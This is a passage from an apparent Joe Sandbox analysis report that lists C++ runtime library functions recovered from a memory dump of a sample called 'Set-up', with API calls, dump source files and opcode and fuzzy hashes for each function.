                                                                                              • ___lc_handle_func.MSVCR100 ref: 6BC3ACCB
                                                                                              • ___lc_codepage_func.MSVCR100 ref: 6BC3ACD4
                                                                                              • _GetLocaleForCP.MSVCP100(?,?,?,?,6BC1C0E9,?,?), ref: 6BC3AD04
                                                                                                • Part of subcall function 6BC3A8CC: _malloc_crt.MSVCR100(0000000C,00000001,00000001,?,00000000,?,6BC3AA3B,?,00000001,00000001,00000000,00000000,?,6BC2249E,00000000,?), ref: 6BC3A90A
                                                                                                • Part of subcall function 6BC3A8CC: InterlockedCompareExchange.KERNEL32(00000000,00000000,00000001), ref: 6BC3A932
                                                                                              • ___mb_cur_max_l_func.MSVCR100(00000000,00000000,00000000,?,?,?,6BC1C0E9,?,?), ref: 6BC3AD11
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000000,6BC1C0E9,?,?), ref: 6BC3AD25
                                                                                              • _errno.MSVCR100 ref: 6BC3AD35
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharCompareExchangeInterlockedLocaleMultiWide___lc_codepage_func___lc_handle_func___mb_cur_max_l_func_errno_malloc_crt
                                                                                              • String ID:
                                                                                              • API String ID: 495737583-0
                                                                                              • Opcode ID: 4cee6113f42ef821aed20b07ae83ae8ab6a4b8332aa6955ab7003449502e375a
                                                                                              • Instruction ID: 0ed128bc209d04cea77b7958de6a18f6c035683e4b9c1f9b4be35419631fe335
                                                                                              • Opcode Fuzzy Hash: 4cee6113f42ef821aed20b07ae83ae8ab6a4b8332aa6955ab7003449502e375a
                                                                                              • Instruction Fuzzy Hash: 9E114472110226AFDF009F28D809BAE7778FB8A761F500054FC00AB290EB38EA51CB71
                                                                                              Function 6BC3B2D3 Relevance: 9.0, APIs: 6, Instructions: 33COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___lc_handle_func.MSVCR100 ref: 6BC3B2D9
                                                                                              • ___lc_codepage_func.MSVCR100 ref: 6BC3B2E7
                                                                                              • _calloc_crt.MSVCR100(00000100,00000002,?,?,6BC1B87C,?), ref: 6BC3B2F7
                                                                                              • __pctype_func.MSVCR100 ref: 6BC3B30B
                                                                                              • memcpy.MSVCR100(?,00000000), ref: 6BC3B315
                                                                                              • __pctype_func.MSVCR100 ref: 6BC3B326
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: __pctype_func$___lc_codepage_func___lc_handle_func_calloc_crtmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 3442565142-0
                                                                                              • Opcode ID: 388ae5328f7fd2922a3168fc374a04e50a2bc459078732cf1ad85c5cfd527cb4
                                                                                              • Instruction ID: 07a5844532a21e6f7a6bb887773284241fd380d831d1d50e858b5b3826ac6362
                                                                                              • Opcode Fuzzy Hash: 388ae5328f7fd2922a3168fc374a04e50a2bc459078732cf1ad85c5cfd527cb4
                                                                                              • Instruction Fuzzy Hash: 42F0CD325407219FEB104FA9C80AA42BBF0FF09722F608428F49996640EB38E6408F41
                                                                                              Function 6BC2A0ED Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 169COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _Maklocchr.LIBCPMT ref: 6BC2A11C
                                                                                                • Part of subcall function 6BC223EC: _Mbrtowc.MSVCP100(00000000,00000000,00000001,00000000,6BC3C44E,?,?,?,6BC3C44E,?), ref: 6BC2240C
                                                                                              • _Maklocchr.LIBCPMT ref: 6BC2A180
                                                                                              • _Maklocchr.LIBCPMT ref: 6BC2A153
                                                                                                • Part of subcall function 6BC2490A: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(?,6BC249A8,?,?,00000000,?,6BC29E20,?,?,?,?,?,00000018), ref: 6BC24915
                                                                                              • _Stolx.MSVCP100(?,?,0000000A,?,?,?,?), ref: 6BC2A275
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Maklocchr$?sgetc@?$basic_streambuf@_MbrtowcStolxU?$char_traits@_W@std@@@std@@
                                                                                              • String ID: -
                                                                                              • API String ID: 1221011742-2547889144
                                                                                              • Opcode ID: b654cfdac58bc2c46950d99e1e35652f11ab975cf888a681b45a95bfbd4941ff
                                                                                              • Instruction ID: aa463169408358bf185072da7a51a1acd109442c44b3109b1e9818cc6dd2be64
                                                                                              • Opcode Fuzzy Hash: b654cfdac58bc2c46950d99e1e35652f11ab975cf888a681b45a95bfbd4941ff
                                                                                              • Instruction Fuzzy Hash: C4513520D213489BDF11DFB4C8827DEBBF9AF85708F04409AE595A7181FBBA5B45C361
                                                                                              Function 6BC2A805 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP100(invalid string position), ref: 6BC2A81E
                                                                                                • Part of subcall function 6BC20D64: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20D79
                                                                                                • Part of subcall function 6BC20D64: _CxxThrowException.MSVCR100(?,6BC4CACC), ref: 6BC20D8F
                                                                                                • Part of subcall function 6BC20D64: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20DAF
                                                                                                • Part of subcall function 6BC20D64: _CxxThrowException.MSVCR100(?,6BC484B4), ref: 6BC20DC5
                                                                                                • Part of subcall function 6BC20D64: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20DE5
                                                                                                • Part of subcall function 6BC20D64: _CxxThrowException.MSVCR100(?,6BC4C9D0), ref: 6BC20DFB
                                                                                                • Part of subcall function 6BC20D64: ??0exception@std@@QAE@ABV01@@Z.MSVCR100(?,?,?,?,6BC4C9D0), ref: 6BC20E11
                                                                                              • ?_Xlength_error@std@@YAXPBD@Z.MSVCP100(string too long), ref: 6BC2A840
                                                                                              • memcpy.MSVCR100(?,?), ref: 6BC2A884
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@$ExceptionThrow$V01@@Xlength_error@std@@Xout_of_range@std@@memcpy
                                                                                              • String ID: invalid string position$string too long
                                                                                              • API String ID: 3077978391-4289949731
                                                                                              • Opcode ID: 0ca72708b84c6cb348e6ab8cc448920741f18f663c1dd256ddb1266db727d60a
                                                                                              • Instruction ID: d6ca4651b49c7031655cad0df478d405d60bd48a067972b7a142725799319d7f
                                                                                              • Opcode Fuzzy Hash: 0ca72708b84c6cb348e6ab8cc448920741f18f663c1dd256ddb1266db727d60a
                                                                                              • Instruction Fuzzy Hash: E51190316246059BC724CE6CD89095AB3F6FFC4714B20491EF8568B250FB34EB0AC7A1
                                                                                              Function 6BC17BB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC17BB7
                                                                                              • ??0invalid_operation@Concurrency@@QAE@PBD@Z.MSVCR100(Deleting link registry before removing all the links,00000010,6BC17E2F), ref: 6BC17BDC
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C880), ref: 6BC17BEB
                                                                                              • ??_V@YAXPAX@Z.MSVCR100(?,00000010,6BC17E2F), ref: 6BC17BF8
                                                                                              Strings
                                                                                              • Deleting link registry before removing all the links, xrefs: 6BC17BD4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0invalid_operation@Concurrency@@ExceptionH_prolog3Throw
                                                                                              • String ID: Deleting link registry before removing all the links
                                                                                              • API String ID: 1654019315-1123019286
                                                                                              • Opcode ID: 5283166c6cff11a5143f91cd0a800b1126fe159245dcb7d31e8fef445b482c17
                                                                                              • Instruction ID: 255faab40580fd5124a3e40d62328442cde154d9a81759bfe33cdf73b25c17a7
                                                                                              • Opcode Fuzzy Hash: 5283166c6cff11a5143f91cd0a800b1126fe159245dcb7d31e8fef445b482c17
                                                                                              • Instruction Fuzzy Hash: DFF089B1C347058BEB208FB1C459B5AB3B4BF51326F508C69D0A5A6450EBBCD344EB70
                                                                                              Function 6BC171F6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC171FD
                                                                                              • ??0invalid_operation@Concurrency@@QAE@PBD@Z.MSVCR100(Deleting link registry before removing all the links,00000010,6BC17481), ref: 6BC17222
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C880), ref: 6BC17231
                                                                                              • ??_V@YAXPAX@Z.MSVCR100(?,00000010,6BC17481), ref: 6BC1723E
                                                                                              Strings
                                                                                              • Deleting link registry before removing all the links, xrefs: 6BC1721A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0invalid_operation@Concurrency@@ExceptionH_prolog3Throw
                                                                                              • String ID: Deleting link registry before removing all the links
                                                                                              • API String ID: 1654019315-1123019286
                                                                                              • Opcode ID: e918322e82d5a800bfe9e9c8b403fbd4c57229fcb2a48f2bb493093b2b0d6e1d
                                                                                              • Instruction ID: 3bef907c80f2102121df728bb7835ce988ccdce288654deaea8af68635408278
                                                                                              • Opcode Fuzzy Hash: e918322e82d5a800bfe9e9c8b403fbd4c57229fcb2a48f2bb493093b2b0d6e1d
                                                                                              • Instruction Fuzzy Hash: C2F0B4B1C34705CBEB208FB0C449B5AB3B47F50327F508829E065A6480EBBCC344AB60
                                                                                              Function 6BC3B1BD Relevance: 7.6, APIs: 5, Instructions: 100COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: String___lc_codepage_func___lc_handle_func__crt__pctype_funcisupper
                                                                                              • String ID:
                                                                                              • API String ID: 3436188357-0
                                                                                              • Opcode ID: a2e2e3c12921741cb0cfc8091cb790bec1eccd877b9fa1f697f18ad4786eb38b
                                                                                              • Instruction ID: eeb3e5d25ffc0e599ebf06a75ce07842ddd7ba0cc0c9b93da4ee3c78ab655751
                                                                                              • Opcode Fuzzy Hash: a2e2e3c12921741cb0cfc8091cb790bec1eccd877b9fa1f697f18ad4786eb38b
                                                                                              • Instruction Fuzzy Hash: 79314431D14A68AFCB118F9AC885B9DBFB4FF11301F548189E894EB281E239D741CB50
                                                                                              Function 6BC3B804 Relevance: 7.6, APIs: 5, Instructions: 97COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: String___lc_codepage_func___lc_handle_func__crt__pctype_funcislower
                                                                                              • String ID:
                                                                                              • API String ID: 2887104122-0
                                                                                              • Opcode ID: e50d73e9eb8d75d88d86f1168a7d774778900b2a0e48dccfa8aab8d73cfde89e
                                                                                              • Instruction ID: 89152ce40bcc0a316cb6a11ca666576c1dcb4ec93d0d2fa3ad5e83551c781275
                                                                                              • Opcode Fuzzy Hash: e50d73e9eb8d75d88d86f1168a7d774778900b2a0e48dccfa8aab8d73cfde89e
                                                                                              • Instruction Fuzzy Hash: 4C310431D14669AFDB108FA9C895BADBBB4FF15304F548089E8A4EB281E338D740CB61
                                                                                              Function 6BC2D98F Relevance: 7.6, APIs: 5, Instructions: 76COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2D996
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,00000014), ref: 6BC2D9BE
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000001,?,00000014), ref: 6BC2D9E6
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,00000014), ref: 6BC2DA26
                                                                                              • ?snextc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(?,?,00000001,?,00000014), ref: 6BC2DA68
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?sgetc@?$basic_streambuf@_H_prolog3_catch$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@_?snextc@?$basic_streambuf@_Ipfx@?$basic_istream@_V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 4122568051-0
                                                                                              • Opcode ID: 3513904ef7d236e2d96e02d8e6159a44bc329ae3bb6dc57ec315f08fd4673fab
                                                                                              • Instruction ID: bd107d344f6b1fc3e42d1fcfea109f8b1b8882b615a864578bb03e48834a5306
                                                                                              • Opcode Fuzzy Hash: 3513904ef7d236e2d96e02d8e6159a44bc329ae3bb6dc57ec315f08fd4673fab
                                                                                              • Instruction Fuzzy Hash: 6E319130A65289CFDB10DF69C491A9DB7F0FF54324B50859EE4A6A72A0EB389F01CF51
                                                                                              Function 6BC2F244 Relevance: 7.6, APIs: 5, Instructions: 76COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2F24B
                                                                                              • ?_Ipfx@?$basic_istream@GU?$char_traits@G@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,00000014), ref: 6BC2F273
                                                                                                • Part of subcall function 6BC1E00D: __EH_prolog3_catch.LIBCMT ref: 6BC1E014
                                                                                                • Part of subcall function 6BC1E00D: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E037
                                                                                                • Part of subcall function 6BC1E00D: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E05C
                                                                                                • Part of subcall function 6BC1E00D: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E085
                                                                                                • Part of subcall function 6BC1E00D: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1E0AE
                                                                                              • ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000001,?,00000014), ref: 6BC2F29B
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,00000014), ref: 6BC2F2DB
                                                                                              • ?snextc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(?,?,00000001,?,00000014), ref: 6BC2F31D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?sgetc@?$basic_streambuf@_H_prolog3_catch$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@_?snextc@?$basic_streambuf@_G@std@@@std@@Ipfx@?$basic_istream@U?$char_traits@V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 560853571-0
                                                                                              • Opcode ID: ea79aad326b2e4a6d38db1ee957d9833d8f18e4335e899bf22c46ebb10bdac11
                                                                                              • Instruction ID: 0f231b2ad7bbb0d294aaa22181a5005503a2a4089ba57e7e4ff651dee4ee2582
                                                                                              • Opcode Fuzzy Hash: ea79aad326b2e4a6d38db1ee957d9833d8f18e4335e899bf22c46ebb10bdac11
                                                                                              • Instruction Fuzzy Hash: D031B434921749CFCB10CFA9C59189EB7F0FF56325B50855ED8A6A72A0E7389B01CF50
                                                                                              Function 6BC2C12F Relevance: 7.6, APIs: 5, Instructions: 73COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2C136
                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,00000014), ref: 6BC2C15E
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000001,?,00000014), ref: 6BC2C186
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,00000014), ref: 6BC2C1BE
                                                                                              • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(?,?,00000001,?,00000014), ref: 6BC2C1FA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: D@std@@@std@@U?$char_traits@$?sgetc@?$basic_streambuf@H_prolog3_catchU?$char_traits@_W@std@@@std@@$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@_?snextc@?$basic_streambuf@Ipfx@?$basic_istream@V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 2633556001-0
                                                                                              • Opcode ID: f4cfbad9a2bfc381a41a0875e8456feeb76208453a11f56e402ba6ff04066081
                                                                                              • Instruction ID: c5c2468c20390408450fd15890f8e70786d0ec2fe1e96ac87b24e21be1bda420
                                                                                              • Opcode Fuzzy Hash: f4cfbad9a2bfc381a41a0875e8456feeb76208453a11f56e402ba6ff04066081
                                                                                              • Instruction Fuzzy Hash: 04319131915749CFCB10CF69C99299EBBF0BF45324B10859EE8A6A72A1E738DB01CF51
                                                                                              Function 6BC3AC0A Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___lc_handle_func.MSVCR100 ref: 6BC3AC2C
                                                                                              • ___lc_collate_cp_func.MSVCR100 ref: 6BC3AC38
                                                                                              • memcpy.MSVCR100(?,?,?), ref: 6BC3AC5F
                                                                                              • __crtLCMapStringA.MSVCR100 ref: 6BC3AC82
                                                                                              • __crtLCMapStringA.MSVCR100 ref: 6BC3ACA8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: String__crt$___lc_collate_cp_func___lc_handle_funcmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 940776641-0
                                                                                              • Opcode ID: b1d35411f88b5a96ef55bcdd9ec6eda5678fbb014108f874b62a640219fa5d50
                                                                                              • Instruction ID: 9bc9a7de38dfb8e842b709c4607b939cfbaecec7efe5106f80a109eddf359209
                                                                                              • Opcode Fuzzy Hash: b1d35411f88b5a96ef55bcdd9ec6eda5678fbb014108f874b62a640219fa5d50
                                                                                              • Instruction Fuzzy Hash: 48217C72915219AFCF11CF95DD85D8E3BB5FB89360F184024F958A7260E236DA60CBA0
                                                                                              Function 6BC28160 Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC28167
                                                                                                • Part of subcall function 6BC1E1BD: __EH_prolog3.LIBCMT ref: 6BC1E1C4
                                                                                                • Part of subcall function 6BC1E1BD: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(?,00000004,6BC1D999,?,00000014,6BC1D4BE,0000000A), ref: 6BC1E1F1
                                                                                              • ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(?,?,?,?,?,?,?,?,?,0000001C), ref: 6BC281A4
                                                                                              • ?snextc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(?,?,?,?,?,?,?,?,?,0000001C), ref: 6BC281AB
                                                                                              • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP100(?,?,?,?,?,?,?,?,?,?,0000001C), ref: 6BC281CF
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,?,?,?,?,0000001C), ref: 6BC28289
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
